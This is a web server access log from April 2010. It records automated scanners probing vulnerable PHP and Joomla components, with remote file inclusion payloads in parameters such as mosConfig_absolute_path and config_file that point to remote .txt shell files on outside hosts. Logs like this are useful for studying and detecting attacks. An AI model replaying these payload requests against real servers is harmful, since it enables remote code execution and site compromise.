123.30.181.5 - - [26/Apr/2010:06:54:18 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
123.30.181.5 - - [26/Apr/2010:06:54:18 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.30.181.5 - - [26/Apr/2010:06:55:07 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
123.30.181.5 - - [26/Apr/2010:06:55:07 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.30.181.5 - - [26/Apr/2010:06:55:07 -0500] "GET /logs/access_log.1266364800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
123.30.181.5 - - [26/Apr/2010:06:55:07 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
84.38.160.77 - - [26/Apr/2010:06:56:50 -0500] "GET /logs//errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
84.38.160.77 - - [26/Apr/2010:06:56:50 -0500] "GET //errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
84.38.160.77 - - [26/Apr/2010:06:56:50 -0500] "GET /logs/access_log.1209600000//errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
207.46.199.191 - - [26/Apr/2010:06:57:17 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.139 - - [26/Apr/2010:06:58:48 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:58:48 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:58:48 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:58:48 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:59:32 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:59:32 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:59:33 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:06:59:33 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
116.122.36.34 - - [26/Apr/2010:07:04:03 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.122.36.34 - - [26/Apr/2010:07:04:03 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.36.34 - - [26/Apr/2010:07:04:03 -0500] "GET /logs/access_log.1232150400//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
116.122.36.34 - - [26/Apr/2010:07:04:16 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.122.36.34 - - [26/Apr/2010:07:04:16 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.36.34 - - [26/Apr/2010:07:04:16 -0500] "GET /logs/access_log.1232150400//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:06:16 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.204.242 - - [26/Apr/2010:07:07:24 -0500] "GET /logs/access_log.1176854400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.139 - - [26/Apr/2010:07:13:00 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:00 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:00 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:00 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:45 -0500] "GET /src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:45 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:45 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
78.110.50.139 - - [26/Apr/2010:07:13:45 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.53.86.226 - - [26/Apr/2010:07:14:04 -0500] "GET /logs/access_log.1219449600/includes/stats.inc.php?prefix=http://www.katalog.artykul.iswift.eu/img/fx29id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
74.53.86.226 - - [26/Apr/2010:07:14:04 -0500] "GET /logs/includes/stats.inc.php?prefix=http://www.katalog.artykul.iswift.eu/img/fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
74.53.86.226 - - [26/Apr/2010:07:14:04 -0500] "GET /includes/stats.inc.php?prefix=http://www.katalog.artykul.iswift.eu/img/fx29id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:16 -0500] "GET /logs//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:16 -0500] "GET //modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:16 -0500] "GET /logs/access_log.1265587200//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:16 -0500] "GET /logs/access_log.1265068800//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:23 -0500] "GET //modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:23 -0500] "GET /logs/access_log.1265068800//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:23 -0500] "GET /logs//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:14:23 -0500] "GET /logs/access_log.1265587200//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:15:23 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:15:23 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:15:23 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:15:38 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:15:38 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:15:38 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:15:39 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:15:39 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:15:39 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
77.92.94.85 - - [26/Apr/2010:07:16:28 -0500] "GET /logs/access_log.1220054400//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:07:16:28 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
77.92.94.85 - - [26/Apr/2010:07:16:28 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.813"
66.59.48.68 - - [26/Apr/2010:07:16:41 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:16:42 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:16:42 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:16:47 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:16:47 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:16:47 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:16:59 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:16:59 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.222.152.66 - - [26/Apr/2010:07:16:59 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:17:10 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:17:10 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.59.48.68 - - [26/Apr/2010:07:17:10 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.46.13.139 - - [26/Apr/2010:07:18:24 -0500] "GET /logs/access_log.1208995200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.244.236.248 - - [26/Apr/2010:07:18:42 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:18:42 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:18:42 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:19:16 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:19:21 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:19:21 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:19:21 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:19:21 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:19:21 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:22:19 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:22:19 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:22:19 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.55.146.200 - - [26/Apr/2010:07:22:31 -0500] "GET /logs//errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.55.146.200 - - [26/Apr/2010:07:22:31 -0500] "GET //errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
72.55.146.200 - - [26/Apr/2010:07:22:31 -0500] "GET /logs/access_log.1238803200//errors.php?error=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
66.244.236.248 - - [26/Apr/2010:07:22:50 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:22:50 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:22:51 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:24:15 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:24:15 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:24:15 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
84.38.160.77 - - [26/Apr/2010:07:24:24 -0500] "GET /logs/access_log.1238803200//errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
84.38.160.77 - - [26/Apr/2010:07:24:24 -0500] "GET //errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.76"
84.38.160.77 - - [26/Apr/2010:07:24:24 -0500] "GET /logs//errors.php?error=http://www.cacador.sc.gov.br/administrator/id.txt??%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.76"
75.126.28.140 - - [26/Apr/2010:07:25:29 -0500] "GET //?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:25:29 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:25:29 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:25:58 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:26:42 -0500] "GET //?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:26:42 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
75.126.28.140 - - [26/Apr/2010:07:26:42 -0500] "GET /logs/access_log.1212969600//?path%5Bdocroot%5D=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:27:44 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:28:07 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:28:18 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:29:41 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:29:53 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:30:04 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:32:13 -0500] "GET /index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:32:13 -0500] "GET /logs/access_log.1220054400%20%20/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:32:13 -0500] "GET /logs/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:34:37 -0500] "GET /index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:34:37 -0500] "GET /logs/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:34:37 -0500] "GET /logs/access_log.1220054400%20%20/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:34:42 -0500] "GET /logs/access_log.1220054400%20%20/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:34:42 -0500] "GET /logs/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:34:42 -0500] "GET /index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:35:06 -0500] "GET /logs/access_log.1220054400/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.244.236.248 - - [26/Apr/2010:07:35:37 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:37:31 -0500] "GET /logs/access_log.1220054400/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.189.224.16 - - [26/Apr/2010:07:37:35 -0500] "GET /logs/access_log.1220054400/index.php?redir=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:38:31 -0500] "GET //styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:38:31 -0500] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:38:31 -0500] "GET /logs/access_log.1270598400%20%20//styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.33.191.150 - - [26/Apr/2010:07:39:40 -0500] "GET /logs/access_log.1270684800%20%20//styles/internal/header.php?tpl_pgb_moddir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.135.134.108 - - [26/Apr/2010:07:39:51 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3223 "-""Mozilla/5.0"
